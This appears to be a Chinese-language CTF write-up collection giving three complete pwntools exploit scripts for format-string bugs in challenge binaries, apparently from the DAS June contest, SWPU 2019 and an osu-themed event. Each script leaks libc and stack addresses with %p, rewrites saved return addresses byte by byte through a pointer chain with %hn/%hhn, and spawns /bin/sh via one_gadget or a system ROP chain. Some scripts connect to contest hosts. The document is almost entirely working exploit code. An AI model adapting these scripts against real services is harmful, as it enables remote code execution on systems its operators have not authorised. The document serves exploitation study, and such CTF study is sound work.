非栈上格式化字符串 例题

DAS 6月赛fooooood:

非栈上格式化字符串,但是只有3次有效输入机会,找跳板(1->2->3->value)可以用两次输入写掉栈上i的值为一个大值从而实现多次输入,后面就是非栈上格式化字符串标准打法,劫持ret可以打rop也可以打one_gadget
exp:

from pwn import *
# pwntools session setup. The "favourite food" answer that sd() sends appears to
# reach a printf-family call as its format string (the %p leaks below only work
# that way); that single defect is what every later step relies on. Any of
# printf("%s", buf), -Wformat-security, or -D_FORTIFY_SOURCE=2 (which rejects %n
# from a writable format string and positional parameters used with gaps)
# removes it.
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
# context(log_level='debug')

# io=remote("node4.buuoj.cn",25718)
io=process("./pwn")   # local target; the commented line above is the contest instance
elf=ELF("./pwn")
libc=ELF("./libc-2.23.so")   # the 240 offset and the one_gadget list below are specific to this libc build

def sd(cc):
    """Send *cc* as one 'favourite food' answer.

    This is the input the program appears to use as a printf format string;
    every leak and write in this script goes through this prompt.
    """
    prompt = b"what's your favourite food: "
    io.sendlineafter(prompt, cc)


io.recvuntil(b"Give me your name:")
payload=b"/bin/sh\x00"
io.sendline(payload)


io.recvuntil(b"what's your favourite food: ")
# Read-only use of the format bug: %p on two argument slots. Slot 11 yields a
# stack address (the pointer-chain "springboard" the writeup refers to), slot 9
# a libc return address; together they defeat ASLR for the rest of the session.
payload="%11$p.%9$p"
io.sendline(payload)

gdb.attach(io)    
pause()

io.recvuntil(b"like ")
stack=int(io.recv(14),16)   # "0x" + 12 hex digits of a user-space pointer
stack0=stack-0xd0   # frame-relative offsets; valid for this binary's stack layout only
ret_addr=stack0-0x10   # saved return address that gets overwritten below
rr=stack0+0xe0   # not used below
# canary=int(io.recv(18),16)
io.recvuntil(b".")
libc_addr=int(io.recv(14),16)-240-libc.sym[b"__libc_start_main"]   # leak is __libc_start_main+240 in the libc-2.23 layout
print("stack: "+hex(stack))
print("stack0: "+hex(stack0))
print("libc_addr: "+hex(libc_addr))
one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247]   # candidates for this libc; their register/stack constraints are listed at the end of the script
shell=one_gadget[3]+libc_addr
sys_addr=libc.sym[b"system"]+libc_addr   # not used below; the one_gadget path is taken instead

# First write: %hn through slot 11 repoints the chained stack slot (37) at
# stack0-0x24, which the writeup identifies as the loop counter i.
off0=(stack0-0x24)&0xffff
payload = "%{}c%{}$hn".format(off0,11)
sd(payload)

sd('%100'+'c%37$hhn')   # overwrite the loop counter i with a large value so more input rounds are available

# off1=(off0+0xc+0x8)
off1=ret_addr   # not used below; fmt_off() takes the address as a parameter

def fmt_off(addr,value):
    """Write the low five bytes of *value* to *addr*, one byte per two inputs.

    Summary of the primitive as used on this page: slot 11 presumably holds a
    pointer to the stack slot read as argument 37, so a %hn through slot 11 aims
    slot 37 at the target byte and a %hhn through slot 37 stores it. Each byte
    costs two inputs, which is why the loop counter was inflated beforehand.
    """
    # First byte: the full 16-bit low half of the target address is set.
    sd("%{}c%{}$hn".format(addr&0xffff,11))
    sd("%{}c%{}$hhn".format(value&0xff,37))

    # Bytes 1..4: only the low byte of the chained pointer changes each round.
    for shift in range(1, 5):
        sd("%{}c%{}$hhn".format((addr+shift)&0xff,11))
        sd("%{}c%{}$hhn".format((value>>(shift*8))&0xff,37))
    
fmt_off(ret_addr,shell)   # byte-by-byte write loop: low 5 bytes of the gadget address over the saved return
# Burn the remaining loop iterations so the vulnerable function finally returns
# into the overwritten address; 87 is presumably derived from the value put
# into i above minus the inputs already consumed.
for i in range(87):
    io.sendline(b"1")


io.interactive()
    
# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   rax == NULL

# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
#   [rsp+0x30] == NULL

# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
#   [rsp+0x50] == NULL

# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
#   [rsp+0x70] == NULL

SWPU_19_login

7/30复习一下
32位,劫持main函数返回地址为one_gadget
exp:

from pwn import *
# context(log_level='debug',arch='x86',terminal=['tmux','splitw','-h'])
context(terminal=['tmux','splitw','-h'])

# Same bug class on a 32-bit target: the password input appears to be used as a
# printf format string (inferred from the %p leaks below).
io=remote("node1.anna.nssctf.cn",28348)   # contest instance; the local variant is the commented line
# io=process("./login")
elf=ELF("./login")
libc=ELF("./libc-2.27.so")   # the 241 offset and the 0x3cbf7 gadget below belong to this build

# gdb.attach(io)
# pause()

sh_addr=0x804b080   # not used below
io.sendafter(b"name: \n",b"/bin/sh\x00")
io.recvuntil(b"word: \n")

# 6 15  -- the argument slots holding a stack pointer and a libc return address

payload=b"%6$p.%15$p"   # read-only use of the bug: both leaks in one input
io.send(payload)
io.recvuntil(b"password: ")
stack_addr=int(io.recv(10),16)   # "0x" + 8 hex digits (32-bit pointer)
io.recvuntil(b".")
leak_addr=int(io.recv(10),16)-241-libc.sym[b"__libc_start_main"]   # leak is __libc_start_main+241 in the libc-2.27 layout
ret_addr=stack_addr+0x24   # main's saved return address (per the writeup header)
shell=leak_addr+0x3cbf7   # one_gadget candidate; its constraints are listed at the end of the script

print("stack_addr: "+hex(stack_addr))
print("ret_addr: "+hex(ret_addr))
print("leak_addr: "+hex(leak_addr))
print("shell: "+hex(shell))

# Three byte writes follow, two inputs each: %hn through slot 22 aims the
# chained stack slot (59) at ret_addr+k, then %hhn through slot 59 stores byte k
# of the gadget address. Only bytes 0..2 are rewritten; the top byte is
# presumably already equal because the saved return is itself a libc address.
io.recvuntil(b"again!\n")
payload="%{}c%{}$hn".format(ret_addr&0xffff,22)
io.send(payload)

io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format(shell&0xff,59)
io.send(payload)


io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((ret_addr+1)&0xff,22)
io.send(payload)

io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((shell>>8)&0xff,59)
io.send(payload)


io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((ret_addr+2)&0xff,22)
io.send(payload)

io.recvuntil(b"again!\n")
payload="%{}c%{}$hhn".format((shell>>16)&0xff,59)
io.send(payload)


io.recvuntil(b"again!\n")
io.send(b"wllmmllw")   # presumably the input that ends the login loop so main returns through the overwritten slot

io.interactive()

# 0x3cbea execve("/bin/sh", esp+0x34, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x34] == NULL

# 0x3cbec execve("/bin/sh", esp+0x38, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x38] == NULL

# 0x3cbf0 execve("/bin/sh", esp+0x3c, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x3c] == NULL

# 0x3cbf7 execve("/bin/sh", esp+0x40, environ)
# constraints:
#   esi is the GOT address of libc
#   [esp+0x40] == NULL

# 0x6729f execl("/bin/sh", eax)
# constraints:
#   esi is the GOT address of libc
#   eax == NULL

# 0x672a0 execl("/bin/sh", [esp])
# constraints:
#   esi is the GOT address of libc
#   [esp] == NULL

# 0x13573e execl("/bin/sh", eax)
# constraints:
#   ebx is the GOT address of libc
#   eax == NULL

# 0x13573f execl("/bin/sh", [esp])
# constraints:
#   ebx is the GOT address of libc
#   [esp] == NULL

osu_miss_analyzer

ogg打不通怎么办,栈上布置rop链,这道题卡输入挺恶心的

from pwn import *
context(terminal=['tmux','splitw','-h'])

# Third instance of the same bug class: the replay's player-name string appears
# to reach a printf-family call as the format argument (see the %p leaks below).
# io=process('./analyzer')
io=remote("chal.osugaming.lol",7273)
elf=ELF('./analyzer')
libc=elf.libc   # libc resolved by pwntools; the 0x29d90, 0xebc81 and gadget offsets below are for that build

# gdb.attach(io,'b *0x4018d9\nc\n')
# pause()

def fi(s,n):
    """Build one replay body with ``s + n`` spliced into the name field.

    The fixed bytes are the replay header/footer the analyzer expects; ``s``
    appears to be the one-byte length prefix of ``n`` (it always matches
    len(n) at the call sites) and ``n`` is the string that later reaches the
    program's format call. The variable part is encoded with the default
    utf-8 codec, so bytes >= 0x80 in ``n`` would not be reproduced 1:1.
    Returns bytes; callers hex-encode the result before sending it.
    """
    head = (
        b"\x00\xFB\xD6\x34\x01\x0B\x20\x32\x65\x61\x37\x32\x32\x31\x38\x65"
        b"\x35\x36\x38\x30\x66\x33\x62\x63\x31\x65\x32\x39\x36\x66\x63\x64"
        b"\x62\x37\x36\x33\x32\x39\x36\x0B"
    )
    tail = (
        b"\x0B\x20\x66\x63\x36\x64\x63\x33\x64\x61\x62\x65\x30\x64\x63\x34"
        b"\x65\x30\x35\x62\x33\x64\x65\x63\x32\x33\x39\x36\x64\x31\x30\x34"
        b"\x32\x33\xDF\x02\x06\x00\x00\x00\xC0\x00\x05\x00\x00\x00\x32\x35"
        b"\x3A\x01\x4C\x04\x01\x28\x00\x00\x00\x0b"
    )
    field = f"{s}{n}".encode()
    return b"".join((head, field, tail))

payload=fi('\x05','%51$p')   # \x05 = length prefix of the 5-char name; read-only use of the bug to leak slot 51
io.sendlineafter(b":\n",payload.hex())   # the program takes the replay as a hex string

io.recvuntil(b"name: ")
leak_addr=int(io.recv(14),16)-0x29d90   # slot 51 is presumably a return address into libc, 0x29d90 past its base
log.success("leak_addr:"+hex(leak_addr))

shell=leak_addr+0xebc81   # one_gadget candidate (constraints at the end); only logged, the ROP chain below is used instead
log.success("shell:"+hex(shell))

pop_rdi=leak_addr+0x000000000002a3e5   # gadget offsets into this libc build
ret=leak_addr+0x0000000000029139
leave_ret=leak_addr+0x000000000004da83   # not used below
str_sh=leak_addr+next(libc.search(b"/bin/sh"))
sys_addr=leak_addr+libc.sym[b"system"]

bss_addr=0x404400   # writable scratch area at a fixed address, so the binary is presumably not PIE

def ab_write(content,addr):
    """Store the low six bytes of *content* at *addr*, one byte per replay upload.

    Each format string is padded to 0x10 so the inline p64 pointer lands in the
    slot read as argument 16 (the %16$hhn target). The pointer is embedded via
    latin-1 and re-encoded as utf-8 inside fi(), which only reproduces it
    byte-for-byte while every pointer byte is < 0x80 — true for the 0x4044xx
    .bss addresses this script passes in.
    """
    for idx in range(6):
        byte = (content >> (8 * idx)) & 0xff
        fmt = '%{}c%16$hhn'.format(byte).ljust(0x10, 'a')
        tp = fmt + p64(addr + idx).decode('latin-1')
        slen = len(tp)
        log.success("slen:" + hex(slen))
        io.sendlineafter(b":\n", fi('\x18', tp).hex())

# ab_write(shell,0x404070)
# ab_write(pop_rdi,bss_addr)
# ab_write(str_sh,bss_addr+8)
# ab_write(sys_addr,bss_addr+16)

## leak stack
payload=fi('\x04','%6$p')   # second read-only use: slot 6 holds a stack pointer
io.sendlineafter(b":\n",payload.hex())
io.recvuntil(b"name: ")
stack_addr=int(io.recv(14),16)
log.success("stack_addr:"+hex(stack_addr))
ret_addr=stack_addr-0x110   # saved return address of the frame; frame-relative offset for this binary only


# gdb.attach(io,'b *0x401686\nc')
# pause()

# Copy of the chain into .bss. leave_ret is never used, so this staged copy
# appears not to be consumed; the fmt_t writes below place the same values at
# the saved return address directly. Looks like a leftover of a pivot attempt.
ab_write(pop_rdi,bss_addr)
ab_write(str_sh,bss_addr+0x8)
ab_write(sys_addr,bss_addr+0x10)

# gdb.attach(io,'')
# pause()

def fmt_t(addr,ctt,off1,off2):
    """Write the low six bytes of *ctt* to *addr* through a two-level pointer chain.

    *off1* indexes a stack slot that presumably points at the slot read as
    argument *off2*: a %hn through off1 aims off2 at the target byte, then a
    %hhn through off2 stores it. Every format string is padded to 0x20 and sent
    with the matching 0x20 length prefix so the replay parser accepts it.
    Each call costs 13 uploads (one %hn plus six address/value pairs).
    """
    def upload(fmt):
        # Pad, log the length, wrap in a replay body and send as hex.
        tp = fmt.ljust(0x20, 'a')
        slen = len(tp)
        log.success("slen:" + hex(slen))
        io.sendlineafter(b":\n", fi('\x20', tp).hex())

    upload("%{}c%{}$hn".format(addr & 0xffff, off1))

    for idx in range(6):
        upload("%{}c%{}$hhn".format((addr + idx) & 0xff, off1))
        upload("%{}c%{}$hhn".format((ctt >> (idx * 8)) & 0xff, off2))
        

# def fmt_t(addr,ctt,off1,off2):
#     io.sendafter(b":\n","%{}c%{}$hn".format(addr&0xffff,off1).hex())
#     io.sendafter(b":\n","%{}c%{}$hhn".format(ctt&0xff,off2).hex())
    
#     for i in range(5):
#         io.sendafter(b":\n","%{}c%{}$hhn".format((addr+i+1)&0xff,off1))
#         io.sendafter(b":\n","%{}c%{}$hhn".format((ctt>>((i+1)*8))&0xff,off2))


# Final chain written straight onto the stack: pop rdi / "/bin/sh" / system
# above the saved return, and a lone ret gadget in the return slot itself
# (presumably for 16-byte stack alignment before system). The return slot is
# written last so it only changes once the rest of the chain is in place.
fmt_t(ret_addr+0x8,pop_rdi,6,85)
fmt_t(ret_addr+0x10,str_sh,6,85)
fmt_t(ret_addr+0x18,sys_addr,6,85)
fmt_t(ret_addr,ret,6,85)

log.success("stack_addr:"+hex(stack_addr))
log.success("ret_addr:"+hex(ret_addr))
log.success("str_sh:"+hex(str_sh))
log.success("pop_rdi:"+hex(pop_rdi))

io.sendlineafter(b":\n",b"ls")   # presumably an input that no longer parses as a replay, ending the loop so the frame returns
io.sendline(b"cat flag.txt")

io.interactive()


# 0xebc81 execve("/bin/sh", r10, [rbp-0x70])
# constraints:
#   address rbp-0x78 is writable
#   [r10] == NULL || r10 == NULL || r10 is a valid argv
#   [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

# 0xebc85 execve("/bin/sh", r10, rdx)
# constraints:
#   address rbp-0x78 is writable
#   [r10] == NULL || r10 == NULL || r10 is a valid argv
#   [rdx] == NULL || rdx == NULL || rdx is a valid envp

# 0xebc88 execve("/bin/sh", rsi, rdx)
# constraints:
#   address rbp-0x78 is writable
#   [rsi] == NULL || rsi == NULL || rsi is a valid argv
#   [rdx] == NULL || rdx == NULL || rdx is a valid envp

# 0xebce2 execve("/bin/sh", rbp-0x50, r12)
# constraints:
#   address rbp-0x48 is writable
#   r13 == NULL || {"/bin/sh", r13, NULL} is a valid argv
#   [r12] == NULL || r12 == NULL || r12 is a valid envp

# 0xebd38 execve("/bin/sh", rbp-0x50, [rbp-0x70])
# constraints:
#   address rbp-0x48 is writable
#   r12 == NULL || {"/bin/sh", r12, NULL} is a valid argv
#   [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

# 0xebd3f execve("/bin/sh", rbp-0x50, [rbp-0x70])
# constraints:
#   address rbp-0x48 is writable
#   rax == NULL || {rax, r12, NULL} is a valid argv
#   [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp

# 0xebd43 execve("/bin/sh", rbp-0x50, [rbp-0x70])
# constraints:
#   address rbp-0x50 is writable
#   rax == NULL || {rax, [rbp-0x48], NULL} is a valid argv
#   [[rbp-0x70]] == NULL || [rbp-0x70] == NULL || [rbp-0x70] is a valid envp